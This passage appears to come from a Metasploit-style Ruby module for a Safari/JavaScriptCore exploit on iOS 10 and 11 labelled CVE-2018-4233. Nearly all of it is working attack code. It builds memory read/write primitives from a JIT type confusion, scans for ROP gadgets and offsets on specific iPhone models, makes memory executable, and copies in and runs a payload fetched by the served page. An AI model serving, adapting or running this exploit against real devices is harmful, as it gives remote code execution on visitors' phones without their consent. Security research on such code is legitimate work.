{\n unboxed[0] = i2f(addr)\n return boxed[0]\n },\n write64: function(where, what) {\n set_victim_addr(where)\n victim_write(this.fakeobj(what))\n reset_victim_addr()\n },\n read64: function(where) {\n set_victim_addr(where)\n var res = this.addrof(victim_read())\n reset_victim_addr()\n return res;\n },\n write_non_zero: function(where, values) {\n for (var i = 0; i < values.length; ++i) {\n if (values[i] != 0)\n this.write64(where + i*8, values[i])\n }\n },\n readInt64: function(where) {\n if (where instanceof Int64) {\n where = Add(where, 0x10);\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = where.asDouble();\n } else {\n set_victim_addr(where);\n }\n boxed[0] = victim_read();\n var res = f2i(unboxed[0]);\n reset_victim_addr();\n return new Int64(res);\n },\n read: function(addr, length) {\n var address = new Int64(addr);\n var a = new Array(length);\n var i;\n\n for (i = 0; i + 8 < length; i += 8) {\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = 0; j < 8; j++) {\n a[i+j] = v[j];\n }\n }\n\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = i; j < length; j++) {\n a[j] = v[j - i];\n }\n\n return a\n },\n test: function() {\n this.write64(boxed_addr + 0x10, 0xfff) // Overwrite index mask, no biggie\n if (0xfff != this.read64(boxed_addr + 0x10)) {\n fail(2)\n }\n },\n }\n // Test read/write\n stage2.test()\n return stage2;\n}\n^\n\n get_mem_rw = (version >= Gem::Version.new('11.2.2')) ? get_mem_rw_ios_11 : get_mem_rw_ios_10\n utils = exploit_data \"javascript_utils\", \"utils.js\"\n int64 = exploit_data \"javascript_utils\", \"int64.js\"\n dump_offsets = ''\n if datastore['DUMP_OFFSETS']\n dump_offsets = %Q^\n var offsetstr = uuid + \" : { \";\n var offsetarray = [ \"_dlsym\", \"_dlopen\", \"__longjmp\", \"regloader\", \"dispatch\", \"stackloader\", \"movx4\", \"ldrx8\", \"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\", \"__platform_memmove\",\n \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\", \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\", \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\", ];\n for (var i = 0; i < offsetarray.length; i++) {\n var offset = offsets[offsetarray[i]];\n if (offset) {\n var offsethex = Sub(offset, cache_slide).toString().replace(\"0x0000000\", \"0x\");\n offsetstr += \"\\\\\"\" + offsetarray[i] + \"\\\\\" : \" + offsethex + \", \";\n }\n }\n offsetstr += \"}, \";\n prompt(\"offsets: \", offsetstr);\n^\n end\n\n html = %Q^\n<html>\n<body>\n<script>\n\n#{utils}\n#{int64}\n\nprint = alert;\nITERS = 1E4;\nALLOCS = 1E3;\n\nvar conversion_buffer = new ArrayBuffer(8);\nvar f64 = new Float64Array(conversion_buffer);\nvar i32 = new Uint32Array(conversion_buffer);\nvar BASE32 = 0x100000000;\n\nfunction f2i(f) {\n f64[0] = f;\n return i32[0] + BASE32 * i32[1];\n}\n\nfunction i2f(i) {\n i32[0] = i % BASE32;\n i32[1] = i / BASE32;\n return f64[0];\n}\n\nfunction hexit(x) {\n if (x instanceof Int64) return x.toString();\n if (x < 0) return \"-\" + hex(-x);\n return \"0x\" + x.toString(16);\n}\n\nfunction fail(x) {\n print('FAIL ' + x);\n location.reload();\n throw null;\n}\n\ncounter = 0;\n\n// CVE-2018-4233\nfunction trigger(constr, modify, res, val) {\n return eval(`\n var o = [13.37]\n var Constructor${counter} = function(o) { ${constr} }\n var hack = false\n var Wrapper = new Proxy(Constructor${counter}, {\n get: function() {\n if (hack) {\n ${modify}\n }\n }\n })\n for (var i = 0; i < ITERS; ++i)\n new Wrapper(o)\n hack = true\n var bar = new Wrapper(o)\n ${res}\n `)\n}\n\nvar workbuf = new ArrayBuffer(0x1000000);\nvar payload = new Uint8Array(workbuf);\n\nfunction pwn() {\n var stage1 = {\n addrof: function(victim) {\n return f2i(trigger(\"this.result = o[0]\", \"o[0] = val\", \"bar.result\", victim))\n },\n fakeobj: function(addr) {\n return trigger(\"o[0] = val\", \"o[0] = {}\", \"o[0]\", i2f(addr))\n },\n test: function() {\n var addr = this.addrof({\n a: 4919\n });\n var x = this.fakeobj(addr);\n if (x.a != 4919) fail(\"stage1\")\n }\n };\n stage1.test();\n\n var stage2 = get_mem_rw(stage1);\n var FPO = #{ios_11 ? \"(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;\" : \"0x18;\"}\n var memory = stage2;\n memory.u32 = _u32;\n\n var wrapper = document.createElement(\"div\");\n var wrapper_addr = stage1.addrof(wrapper);\n var el_addr = memory.readInt64(wrapper_addr + FPO);\n var vtab = memory.readInt64(el_addr);\n\n var anchor = memory.readInt64(vtab);\n var hdr = Sub(anchor, anchor.lo() & 0xfff);\n var b = [];\n while(true)\n {\n if (memory.readInt64(hdr).lo() == 4277009104) {\n fail('WebCore ' + hdr + ' post spectre support coming soon');\n }\n if(strcmp(memory.read(hdr, 0x10), \"dyld_v1 arm64\"))\n {\n break;\n }\n hdr = Sub(hdr, 0x1000);\n }\n\n var base_seg = null;\n var nsegs = memory.u32(Add(hdr, 0x14));\n var segdata = memory.read(Add(hdr, memory.u32(Add(hdr, 0x10))), nsegs * 0x20);\n var segs = [];\n for(var i = 0; i < nsegs; ++i)\n {\n var off = i * 0x20;\n var seg =\n {\n addr: new Int64(segdata.slice(off + 0x0, off + 0x8)),\n size: new Int64(segdata.slice(off + 0x8, off + 0x10)),\n fileoff: new Int64(segdata.slice(off + 0x10, off + 0x18)),\n maxprot: b2u32(segdata.slice(off + 0x18, off + 0x1c)),\n initprot: b2u32(segdata.slice(off + 0x1c, off + 0x20))\n };\n segs.push(seg);\n if(seg.fileoff.hi() == 0 && seg.fileoff.lo() == 0 && (seg.size.hi() != 0 || seg.size.lo() != 0))\n {\n base_seg = seg;\n }\n }\n if(base_seg == null)\n {\n fail(\"base_seg\");\n }\n\n var cache_slide = Sub(hdr, base_seg.addr);\n var uuid = memory.readInt64(Add(hdr, 0x58)).lo();\n var offset_cache = {\n // iPod Touch 10.1.1\n 788795426 : { \"_dlsym\" : 0x18052ddd8, \"_dlopen\" : 0x18052dd10, \"__longjmp\" : 0x1806ffb78, \"regloader\" : 0x180f0622c, \"dispatch\" : 0x180d7e058, \"stackloader\" : 0x18099a8e8, \"_mach_task_self_\" : 0x1a586e3bc,\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806240a4, \"__platform_memmove\" : 0x1806ffe00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a457c438, },\n\n // iPhone 5S 10.2.1\n 3432281541 : { \"_dlsym\" : 0x18052edd8, \"_dlopen\" : 0x18052ed10, \"__longjmp\" : 0x180700b78, \"regloader\" : 0x180f07230, \"dispatch\" : 0x180d7f05c, \"stackloader\" : 0x18099b8ec, \"mach_task_self\" : 0x1a6da23bc,\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806250c0, \"__platform_memmove\" : 0x180700e00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a5a0d438, },\n\n // iPhone 6S 11.0.3\n 425478416 : { \"_dlsym\" : 0x180587574, \"_dlopen\" : 0x180587460, \"__longjmp\" : 0x1807bd7dc, \"regloader\" : 0x180051ad8, \"dispatch\" : 0x19b323a4c, \"stackloader\" : 0x19b2e6f40, \"movx4\" : 0x19b33305c,\n \"ldrx8\" : 0x180060028, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1b15d8a00, \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\" : 0x1b15d8a08, \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\" : 0x1b15d89f8, },\n };\n\n var offsets = offset_cache[uuid];\n if (offsets)\n {\n var k = Object.keys(offsets);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n offsets[s] = Add(offsets[s], cache_slide);\n }\n }\n else\n {\n var syms = {};\n var gadgets = {};\n\n for(var i = 0; i < segs.length; ++i)\n {\n segs[i].addr = Add(segs[i].addr, cache_slide);\n }\n var libs =\n {\n \"/usr/lib/system/libdyld.dylib\": [\"_dlsym\", \"_dlopen\"],\n #{ ios_11 ? '\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"],\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\"],\n ' : '\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\", \"__platform_memmove\"],\n \"/usr/lib/system/libsystem_kernel.dylib\": [\"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\"],\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"],\n '}\n }\n\n #{ ios_11 ? '\n var opcodes = {\n // ldr x8, [sp] ; str x8, [x19] ; ldp x29, x30, [sp, #0x20] ; ldp x20, x19, [sp, #0x10] ; add sp, sp, #0x30 ; ret\n \"ldrx8\": [ [0xf94003e8, 0xf9000268, 0xa9427bfd, 0xa9414ff4, 0x9100c3ff, 0xd65f03c0] ],\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\n \"dispatch\": [ [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ] ],\n // mov x3, x22 ; mov x6, x27 ; mov x0, x24 ; mov x1, x19 ; mov x2, x23 ; ldr x4, [sp] ; blr x8\n \"regloader\": [ [ 0xaa1603e3, 0xaa1b03e6, 0xaa1803e0, 0xaa1303e1, 0xaa1703e2, 0xf94003e4, 0xd63f0100 ] ],\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\n \"stackloader\": [ [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ] ],\n // mov x4, x20 ; blr x8\n \"movx4\": [ [ 0xaa1403e4, 0xd63f0100 ] ],\n }\n var opcode_libs = [\n \"/usr/lib/PN548.dylib\", // dispatch, stackloader\n \"/usr/lib/libc++.1.dylib\", // ldrx8, regloader, movx4, stackloader\n ];\n\n ' : '\n var opcodes = {\n // mov x0, x23; mov x1, x22; mov x2, x24; mov x3, x25; mov x4, x26; mov x5, x27; blr x28\n \"regloader\": [ [ 0xaa1703e0, 0xaa1603e1, 0xaa1803e2, 0xaa1903e3, 0xaa1a03e4, 0xaa1b03e5, 0xd63f0380 ] ],\n \"dispatch\": [\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\n [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ],\n // blr x21; sub sp, x29, 0x20; ldp x29, x30, [sp, 0x20]; ldp x20, x19, [sp, 0x10]; ldp x22, x21, [sp], 0x30; ret\n [ 0xd63f02a0, 0xd10083bf, 0xa9427bfd, 0xa9414ff4, 0xa8c357f6, 0xd65f03c0 ],\n ],\n \"stackloader\": [\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\n [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ],\n // sub sp, x29, 0x50; ldp x29, x30, [sp, 0x50]; ldp x20, x19, [sp, 0x40]; ldp x22, x21, [sp, 0x30];\n // ldp x24, x23, [sp, 0x20]; ldp x26, x25, [sp, 0x10]; ldp x28, x27, [sp], 0x60; ret\n [ 0xd10143bf, 0xa9457bfd, 0xa9444ff4, 0xa94357f6, 0xa9425ff8, 0xa94167fa, 0xa8c66ffc, 0xd65f03c0 ],\n ],\n };\n\n var opcode_libs = [ \"/usr/lib/libLLVM.dylib\" ];\n '}\n\n var imgs = Add(hdr, memory.u32(Add(hdr, 0x18)));\n var nimgs = memory.u32(Add(hdr, 0x1c));\n for(var i = 0; i < nimgs; ++i)\n {\n var straddr = off2addr(segs, memory.u32(Add(imgs, i * 0x20 + 0x18)));\n var fn = function(i)\n {\n return memory.read(Add(straddr, i), 1)[0];\n };\n var base = Add(memory.readInt64(Add(imgs, i * 0x20)), cache_slide);\n if(opcode_libs.some(lib => strcmp(fn, lib)))\n {\n var ncmds = memory.u32(Add(base, 0x10));\n for(var j = 0, off = 0x20; j < ncmds; ++j)\n {\n var cmd = memory.u32(Add(base, off));\n if(cmd == 0x19 && strcmp(memory.read(Add(base, off + 0x8), 0x10), \"__TEXT\")) // LC_SEGMENT_64\n {\n var nsects = memory.u32(Add(base, off + 0x40));\n for(var k = 0, o = off + 0x48; k < nsects; ++k)\n {\n if(strcmp(memory.read(Add(base, o), 0x10), \"__text\"))\n {\n var keys = Object.keys(opcodes).filter(k=>!gadgets.hasOwnProperty[k])\n if (keys.length == 0) break;\n\n var addr = Add(memory.readInt64(Add(base, o + 0x20)), cache_slide)\n var size = memory.u32(Add(base, o + 0x28))\n\n // Copy the entire __text region into a Uint32Array for faster processing.\n // Previously you could map a Uint32Array over the data, but on i7+ devices\n // this caused access violations.\n // Instead we read the entire region and copy it into a Uint32Array. The\n // memory.read primitive has a weird limitation where it's only able to read\n // up to 4096 bytes. to get around this we'll read multiple times and combine\n // them into one.\n\n var allData = new Uint32Array(size / 4)\n for (var r = 0; r < size; r += 4096) {\n // Check to ensure we don't read out of the region we want\n var qty = 4096\n if (size - r < qty) {\n qty = size - r\n }\n var data = memory.read(Add(addr, r), qty)\n\n // Data is an array of single bytes. This code takes four entries\n // and converts them into a single 32-bit integer. It then adds it\n // into the `allData` array at the given index\n for (var h = 0; h < qty; h += 4) {\n var fourBytes = b2u32(data.slice(h, h + 4))\n allData[(r + h) / 4] = fourBytes\n }\n }\n\n // Loop through the entire data map looking for each gadget we need\n for (var f = 0; f < size && keys.length > 0; f++) {\n\n // Check every gadget\n for (var z = 0; z < keys.length; z++) {\n var key = keys[z];\n var opcode_list = opcodes[key];\n for (var y = 0; y < opcode_list.length; y++) {\n var opcode = opcode_list[y];\n for (var t = 0; t < opcode.length; t++) {\n var op = allData[f+t];\n if (op == opcode[t]) {\n if (t == opcode.length - 1) {\n gadgets[key] = Add(addr, f*4);\n keys.splice(z, 1);\n z = keys.length;\n break;\n }\n continue;\n }\n break;\n }\n }\n }\n }\n\n break;\n }\n o += 0x50;\n }\n break;\n }\n off += memory.u32(Add(base, off + 0x4));\n }\n continue;\n }\n var lookup = null;\n for(var k = Object.keys(libs), j = 0; j < k.length; ++j)\n {\n if(strcmp(fn, k[j]))\n {\n lookup = libs[k[j]];\n break;\n }\n }\n if(lookup != null)\n {\n fsyms(memory, base, segs, lookup, syms);\n }\n }\n\n var vals = Object.keys(libs).map(function(key) {\n return libs[key];\n });\n var k = vals.reduce(function(p,c){ c.forEach(function(e){ p.push(e) });return p; }, []);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n if(syms[s] == null)\n {\n fail(s);\n }\n syms[s] = Add(syms[s], cache_slide);\n }\n k = Object.keys(opcodes);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n if(gadgets[s] == null)\n {\n fail(s);\n }\n }\n\n offsets = {}\n offsets[\"regloader\"] = gadgets[\"regloader\"];\n offsets[\"dispatch\"] = gadgets[\"dispatch\"];\n offsets[\"stackloader\"] = gadgets[\"stackloader\"];\n offsets[\"ldrx8\"] = gadgets[\"ldrx8\"];\n offsets[\"movx4\"] = gadgets[\"movx4\"];\n offsets[\"__longjmp\"] = syms[\"__longjmp\"];\n offsets[\"__kernelrpc_mach_vm_protect_trap\"] = syms[\"__kernelrpc_mach_vm_protect_trap\"];\n offsets[\"__platform_memmove\"] = syms[\"__platform_memmove\"];\n offsets[\"_dlopen\"] = syms[\"_dlopen\"];\n offsets[\"_dlsym\"] = syms[\"_dlsym\"];\n offsets[\"_mach_task_self_\"] = syms[\"_mach_task_self_\"];\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\n offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] = syms[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"];\n\n if (offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] != null) {\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"], 8);\n }\n #{ ios_11 ? '\n if (offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] != null) {\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"], 8);\n }' : ''}\n\n#{dump_offsets}\n\n }\n\n\n var regloader = offsets[\"regloader\"];\n var dispatch = offsets[\"dispatch\"];\n var stackloader = offsets[\"stackloader\"];\n var longjmp = offsets[\"__longjmp\"];\n var mach_vm_protect = offsets[\"__kernelrpc_mach_vm_protect_trap\"];\n var memmove = offsets[\"__platform_memmove\"];\n var dlopen = offsets[\"_dlopen\"];\n var dlsym = offsets[\"_dlsym\"];\n var task_self = offsets[\"_mach_task_self_\"]\n var endOfFixedMem = offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\n var startOfFixedMem = offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\n\n var ldrx8 = offsets[\"ldrx8\"]; // might be null\n var movx4 = offsets[\"movx4\"]; // might be null\n\n var mach_task_self_ = new Int64(memory.readInt64(task_self).lo());\n var memPoolEnd = memory.readInt64(endOfFixedMem);\n\n var memPoolStart = Int64.Zero;\n if (startOfFixedMem) {\n memPoolStart = memory.readInt64(startOfFixedMem);\n }\n\n var jitWriteSeparateHeaps = Int64.Zero;\n if (offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]) {\n jitWriteSeparateHeaps = memory.readInt64(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]);\n }\n\n var shsz = new Int64(\"0x100000\");\n var paddr = memory.readInt64(Add(stage1.addrof(payload), 0x10));\n var codeAddr = Sub(memPoolEnd, shsz);\n codeAddr = Sub(codeAddr, codeAddr.lo() & 0x3fff);\n\n memory.writeInt64(Add(vtab, 0x18), longjmp);\n memory.writeInt64(Add(el_addr, 0x58), stackloader); // x30 (gadget)\n\n var arrsz = 0x100000,\n off = 0x1000;\n var arr = new Uint32Array(arrsz);\n var stack = memory.readInt64(Add(stage1.addrof(arr), 0x10));\n\n var pos = arrsz - off;\n\n var add_call_llvm = function(func, x0, x1, x2, x3, x4, jump_to) {\n x4 = x4 || Int64.Zero\n\n // in stackloader:\n arr[pos++] = 0xdead0010; // unused\n arr[pos++] = 0xdead0011; // unused\n arr[pos++] = 0xdead0012; // unused\n arr[pos++] = 0xdead0013; // unused\n arr[pos++] = dispatch.lo(); // x28 (gadget for regloader)\n arr[pos++] = dispatch.hi(); // x28 (gadget for regloader)\n arr[pos++] = 0xdead0014; // x27 (unused)\n arr[pos++] = 0xdead0015; // x27 (unused)\n arr[pos++] = x4.lo(); // x26 == x4 (arg5)\n arr[pos++] = x4.hi(); // x26 == x4 (arg5)\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\n arr[pos++] = x2.lo(); // x24 == x2 (arg3)\n arr[pos++] = x2.hi(); // x24 == x2 (arg3)\n arr[pos++] = x0.lo(); // x23 == x0 (arg1)\n arr[pos++] = x0.hi(); // x23 == x0 (arg1)\n arr[pos++] = x1.lo(); // x22 == x1 (arg2)\n arr[pos++] = x1.hi(); // x22 == x1 (arg2)\n arr[pos++] = func.lo(); // x21 (func)\n arr[pos++] = func.hi(); // x21 (func)\n arr[pos++] = 0xdbad0018; // x20 (unused)\n arr[pos++] = 0xdbad0019; // x20 (unused)\n arr[pos++] = 0xdead001a; // x19 (unused)\n arr[pos++] = 0xdead001b; // x19 (unused)\n var tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4 + 0x40).lo(); // x29\n arr[pos++] = Add(stack, tmppos*4 + 0x40).hi(); // x29\n arr[pos++] = regloader.lo(); // x30 (first gadget)\n arr[pos++] = regloader.hi(); // x30 (first gadget)\n\n // after dispatch:\n arr[pos++] = 0xdead0020; // unused\n arr[pos++] = 0xdead0021; // unused\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n arr[pos++] = 0xdead0024; // x22 (unused)\n arr[pos++] = 0xdead0025; // x22 (unused)\n arr[pos++] = 0xdead0026; // x21 (unused)\n arr[pos++] = 0xdead0027; // x21 (unused)\n arr[pos++] = 0xdead0028; // x20 (unused)\n arr[pos++] = 0xdead0029; // x20 (unused)\n arr[pos++] = 0xdead002a; // x19 (unused)\n arr[pos++] = 0xdead002b; // x19 (unused)\n tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4 + 0x70).lo(); // x29\n arr[pos++] = Add(stack, tmppos*4 + 0x70).hi(); // x29\n arr[pos++] = jump_to.lo(); // x30 (gadget)\n arr[pos++] = jump_to.hi(); // x30 (gadget)\n }\n\n var add_call_via_x8 = function(func, x0, x1, x2, x3, x4, jump_to) {\n //alert(`add_call_via_x8: ${func}(${x0}, ${x1}, ${x2}, ${x3}, ${x4}, ${jump_to})`);\n //x4 = x4 || Int64.One\n // in stackloader:\n arr[pos++] = 0xdead0010; // unused\n arr[pos++] = 0xdead0011; // unused\n arr[pos++] = 0xdead0012; // unused\n arr[pos++] = 0xdead0013; // unused\n arr[pos++] = 0xdead1101; // x28 (unused)\n arr[pos++] = 0xdead1102; // x28 (unused)\n arr[pos++] = 0xdead0014; // x27 == x6 (unused)\n arr[pos++] = 0xdead0015; // x27 == x6 (unused)\n arr[pos++] = 0xdead0016; // x26 (unused)\n arr[pos++] = 0xdead0017; // x26 (unused)\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\n arr[pos++] = x0.lo(); // x24 == x0 (arg1)\n arr[pos++] = x0.hi(); // x24 == x0 (arg1)\n arr[pos++] = x2.lo(); // x23 == x2 (arg3)\n arr[pos++] = x2.hi(); // x23 == x2 (arg3)\n arr[pos++] = x3.lo(); // x22 == x3 (arg4)\n arr[pos++] = x3.hi(); // x22 == x3 (arg4)\n arr[pos++] = func.lo(); // x21 (target for dispatch)\n arr[pos++] = func.hi(); // x21 (target for dispatch)\n arr[pos++] = 0xdead0018; // x20 (unused)\n arr[pos++] = 0xdead0019; // x20 (unused)\n var tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = 0xdead001c; // x29 (unused)\n arr[pos++] = 0xdead001d; // x29 (unused)\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\n\n // in ldrx8\n if (x4) {\n arr[pos++] = stackloader.lo();\n arr[pos++] = stackloader.hi();\n } else {\n arr[pos++] = dispatch.lo(); // x8 (target for regloader)\n arr[pos++] = dispatch.hi(); // x8 (target for regloader)\n }\n arr[pos++] = 0xdead1401; // (unused)\n arr[pos++] = 0xdead1402; // (unused)\n arr[pos++] = 0xdead1301; // x20 (unused)\n arr[pos++] = 0xdead1302; // x20 (unused)\n arr[pos++] = x1.lo(); // x19 == x1 (arg2)\n arr[pos++] = x1.hi(); // x19 == x1 (arg2)\n arr[pos++] = 0xdead1201; // x29 (unused)\n arr[pos++] = 0xdead1202; // x29 (unused)\n arr[pos++] = regloader.lo(); // x30 (next gadget)\n arr[pos++] = regloader.hi(); // x30 (next gadget)\n\n // in regloader\n // NOTE: REGLOADER DOES NOT ADJUST SP!\n // sometimes i didn't get expected value in x4\n // and i have no earthly idea why\n // usleep likely did the trick, but I would still keep the code\n // with movx4\n //arr[pos++] = x4.lo() // x4 (should be -- but see lines above)\n //arr[pos++] = x4.hi() // x4 (should be -- but see lines above)\n\n if (x4) {\n // in stackloader:\n arr[pos++] = 0xdaad0010; // unused\n arr[pos++] = 0xdaad0011; // unused\n arr[pos++] = 0xdaad0012; // unused\n arr[pos++] = 0xdaad0013; // unused\n arr[pos++] = 0xdaad1101; // x28 (unused)\n arr[pos++] = 0xdaad1102; // x28 (unused)\n arr[pos++] = 0xdaad0014; // x27 == x6 (unused)\n arr[pos++] = 0xdaad0015; // x27 == x6 (unused)\n arr[pos++] = 0xdaad0016; // x26 (unused)\n arr[pos++] = 0xdaad0017; // x26 (unused)\n arr[pos++] = 0xdaad0018; // x25 (unused)\n arr[pos++] = 0xdaad0019; // x25 (unused)\n arr[pos++] = 0xdaad00f0; // x24 (unused)\n arr[pos++] = 0xdaad00f1; // x24 (unused)\n arr[pos++] = 0xdaad00f2; // x23 (unused)\n arr[pos++] = 0xdaad00f3; // x23 (unused)\n arr[pos++] = 0xdaad00f4; // x22 (unused)\n arr[pos++] = 0xdaad00f5; // x22 (unused)\n arr[pos++] = func.lo(); // x21 (target for dispatch)\n arr[pos++] = func.hi(); // x21 (target for dispatch)\n arr[pos++] = 0xdaad0018; // x20 (unused)\n arr[pos++] = 0xdaad0019; // x20 (unused)\n tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = 0xdaad001c; // x29 (unused)\n arr[pos++] = 0xdaad001d; // x29 (unused)\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\n\n // in ldrx8\n arr[pos++] = dispatch.lo(); // x8 (target for movx4)\n arr[pos++] = dispatch.hi(); // x8 (target for movx4)\n arr[pos++] = 0xdaad1401; // (unused)\n arr[pos++] = 0xdaad1402; // (unused)\n arr[pos++] = x4.lo(); // x20 == x4 (arg5)\n arr[pos++] = x4.hi(); // x20 == x4 (arg5)\n arr[pos++] = 0xdaad1301; // x19 (unused)\n arr[pos++] = 0xdaad1302; // x19 (unused)\n arr[pos++] = 0xdaad1201; // x29 (unused)\n arr[pos++] = 0xdaad1202; // x29 (unused)\n arr[pos++] = movx4.lo(); // x30 (next gadget)\n arr[pos++] = movx4.hi(); // x30 (next gadget)\n }\n\n // after dispatch:\n\n // keep only one: these or 0xdeaded01\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n arr[pos++] = 0xdead0024; // x22 (unused)\n arr[pos++] = 0xdead0025; // x22 (unused)\n arr[pos++] = 0xdead0026; // x21 (unused)\n arr[pos++] = 0xdead0027; // x21 (unused)\n arr[pos++] = 0xdead0028; // x20 (unused)\n arr[pos++] = 0xdead0029; // x20 (unused)\n arr[pos++] = 0xdead002a; // x19 (unused)\n arr[pos++] = 0xdead002b; // x19 (unused)\n arr[pos++] = 0xdead002c; // x29 (unused)\n arr[pos++] = 0xdead002d; // x29 (unused)\n arr[pos++] = jump_to.lo(); // x30 (gadget)\n arr[pos++] = jump_to.hi(); // x30 (gadget)\n }\n\n var add_call = function(func, x0, x1, x2, x3, x4, jump_to) {\n x0 = x0 || Int64.Zero\n x1 = x1 || Int64.Zero\n x2 = x2 || Int64.Zero\n x3 = x3 || Int64.Zero\n jump_to = jump_to || stackloader\n\n return (ldrx8 ? add_call_via_x8 : add_call_llvm)(\n func, x0, x1, x2, x3, x4, jump_to\n )\n }\n\n #{ios_11 ? '\n if (jitWriteSeparateHeaps.lo() || jitWriteSeparateHeaps.hi()) {\n add_call(jitWriteSeparateHeaps\n , Sub(codeAddr, memPoolStart) // off\n , paddr // src\n , shsz // size\n );\n } else {\n fail(\"jitWrite\");\n }\n ' : '\n add_call(mach_vm_protect,\n mach_task_self_, // task\n codeAddr, // addr\n shsz, // size\n new Int64(0), // set maximum\n new Int64(7) // prot (RWX)\n );\n\n add_call(memmove,\n codeAddr, // dst\n paddr, // src\n shsz // size\n );\n '}\n\n add_call(codeAddr,\n dlopen,\n dlsym,\n jitWriteSeparateHeaps,\n memPoolStart,\n memPoolEnd,\n );\n\n for(var i = 0; i < 0x20; ++i)\n {\n arr[pos++] = 0xde00c0de + (i<<16);\n }\n\n var sp = Add(stack, (arrsz - off) * 4);\n memory.writeInt64(Add(el_addr, 0x60), Add(sp, 0x60)); // x29\n memory.writeInt64(Add(el_addr, 0x68), sp); // x2 (copied into sp)\n\n // trigger\n //print(\"u rdy?\")\n wrapper.addEventListener(\"click\", function(){});\n\n}\n\n#{get_mem_rw}\n\nfunction go() {\n try {\n var req = new XMLHttpRequest;\n req.open(\"GET\", \"exploit\");\n req.responseType = \"arraybuffer\";\n req.addEventListener(\"load\", function() {\n try 